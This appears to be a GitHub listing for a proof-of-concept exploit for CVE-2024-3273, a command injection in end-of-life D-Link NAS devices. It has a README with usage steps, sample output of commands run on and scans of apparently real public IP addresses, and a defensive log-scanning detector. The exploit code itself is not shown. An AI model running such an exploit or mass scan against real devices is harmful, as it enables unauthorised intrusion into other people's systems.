CVE-2024-3273 PoC — D-Link DNS-320L/DNS-325/DNS-327L/DNS-340L HTTP GET Request nas_sharing.cgi command injection

Associated Vulnerability
Title: D-Link DNS-320L/DNS-325/DNS-327L/DNS-340L HTTP GET Request nas_sharing.cgi command injection (CVE-2024-3273)
Description: ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
Description
Exploit for CVE-2024-3273, supports single and multiple hosts
Readme
# CVE-2024-3273 Proof of Concept (PoC)

This repository contains a Proof of Concept (PoC) for CVE-2024-3273, a security vulnerability discovered in D-Link NAS devices. The vulnerability allows attackers to execute arbitrary commands on vulnerable devices.

## Description

CVE-2024-3273 is a vulnerability in D-Link NAS devices that allows remote attackers to execute arbitrary commands via a crafted HTTP request to the `cgi-bin/nas_sharing.cgi` endpoint.

This PoC demonstrates how the vulnerability can be exploited to execute commands on vulnerable D-Link NAS devices.
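
For defenders, the request shape described above (a request to `cgi-bin/nas_sharing.cgi` carrying a `system` argument) can be searched for in web access logs. The following is an added example, not part of this repository: it assumes a reverse proxy or gateway in front of the NAS writes combined-format access logs, and `find_suspicious`, the sample lines and the severity heuristic are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed log layout (combined/common format): client, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
CGI_PATH = "/cgi-bin/nas_sharing.cgi"  # endpoint named in the advisory
INJECTED_ARG = "system"                # argument named in the advisory

# Constructed sample lines; addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [08/Apr/2024:10:01:02 +0000] '
    '"GET /cgi-bin/nas_sharing.cgi?x=1&system=PLACEHOLDER HTTP/1.1" 200 312',
    '198.51.100.7 - - [08/Apr/2024:10:01:09 +0000] '
    '"GET /cgi-bin//nas_sharing.cgi?system=PLACEHOLDER HTTP/1.1" 404 0',
    '192.0.2.10 - - [08/Apr/2024:10:02:00 +0000] '
    '"GET /cgi-bin/nas_sharing.cgi?action=list HTTP/1.1" 200 88',
    '203.0.113.5 - - [08/Apr/2024:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]


def find_suspicious(lines):
    """Return {client: [(timestamp, status, severity), ...]} for matching requests."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        url = urlsplit(m["target"])
        # Percent-decode and collapse duplicate slashes so trivial variants still match.
        path = re.sub(r"/+", "/", unquote(url.path))
        if path != CGI_PATH:
            continue
        if INJECTED_ARG not in parse_qs(url.query, keep_blank_values=True):
            continue
        # Heuristic (assumption): a 2xx status means the device answered, so triage first.
        severity = "high" if m["status"].startswith("2") else "review"
        hits[m["client"]].append((m["ts"], int(m["status"]), severity))
    return dict(hits)


if __name__ == "__main__":
    for client, events in find_suspicious(SAMPLE_LOG).items():
        print(client, events)
```

Because the affected models are end-of-life and will not be patched, a hit on a device that is still reachable is a reason to isolate and replace it, as the vendor note above advises.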

## Requirements

- Python 3.x
- `requests` library

## Usage

1. Clone this repository:

    ```bash
    git clone https://github.com/adhikara13/CVE-2024-3273.git
    ```

2. Navigate to the repository directory:

    ```bash
    cd CVE-2024-3273
    ```

3. Run the PoC:

    ```bash
    python main.py
    ```

4. Follow the on-screen instructions to choose the target device:
   
   - **Option 1: Single Host (1)**: Enter details for a single target device, including the host IP address and command to run.
   - **Option 2: Multiple Hosts (2)**: Provide a file containing multiple target devices in the format `host:port`, and choose whether to export vulnerable hosts to `vulnerables.txt`.

## Example

```
┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛

Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi

┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛

Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.
```

## Disclaimer

This PoC is for educational and research purposes only. Use it responsibly and only on devices you are authorized to test.

## Contributing

Contributions are welcome! If you find any issues or improvements, feel free to open an issue or create a pull request.
File Snapshot

```
[4.0K] /data/pocs/88cb9b504aeb82055e14ca3956f3b13c0e8b8c44
├── [ 34K] LICENSE
├── [2.6K] main.py
└── [2.4K] README.md

0 directories, 3 files
```